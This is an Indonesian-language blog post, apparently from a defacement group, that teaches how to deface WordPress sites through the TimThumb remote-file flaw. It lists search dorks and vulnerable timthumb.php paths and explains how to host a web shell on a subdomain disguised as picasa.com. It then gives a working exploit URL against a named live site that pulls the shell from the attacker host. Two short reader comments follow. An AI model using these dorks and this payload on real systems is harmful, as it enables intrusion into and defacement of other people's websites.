Deface Timthumb
Gambar hanya pemanis hwhwhw
Pertama siapa kan bahan bahan berikut:
Dork
PC/laptop
Internet
Subdomain picasa.com.webkamu.org/Shell.php
Ket: Buat Subdomain di cpanel kamu ato di hosting picasa.com.websitekamu.org dan upload Shell disubdo tersebut
Langkah pertama
Siapakan dork dulu ya pantek
wp-content/plugins/wp-pagenavi/timthumb.php
wp-content/plugins/wp-pagenavi/inc/timthumb.php
wp-content/plugins/wp-pagenavi/functions/timthumb.php
wp-content/plugins/wp-pagenavi/scripts/timthumb.php
wp-content/themes/canvas/timthumb.php
wp-content/themes/TheStyle/timthumb.php
wp-content/plugins/wp-pagenavi/inc/timthumb.php
wp-content/plugins/wp-pagenavi/functions/timthumb.php
wp-content/plugins/wp-pagenavi/scripts/timthumb.php
wp-content/themes/canvas/timthumb.php
wp-content/themes/TheStyle/timthumb.php
Disini saya memakai dork
inurl:/wp-content/themes/hulk-businessportfolio-wordpress-theme/hulk/scripts/timthumb.php
Live target
http://microgigz.com/wp-content/themes/hulk-businessportfolio-wordpress-theme/hulk/scripts/timthumb.php
Jika ada tanda
no image specified Query String : TimThumb version : 1.x bla blaTanda nya web itu vuln dan harus Timthumb versi 1.x
Kita masukan Exploit nya
http://microgigz.com/wp-content/themes/hulk-businessportfolio-wordpress-theme/hulk/scripts/timthumb.php?src=http://picasa.com.webkamu.org
Jika keluar seperti tanda nya sukses
Tinggal kita kita check saja
Mudah kan \('.')/
Mr.Swan ~ Error Violence
ngakak gan gambarnya
ReplyDeletedapet dari mana gan gambarnya kaya tau itu lokasinya?
ReplyDelete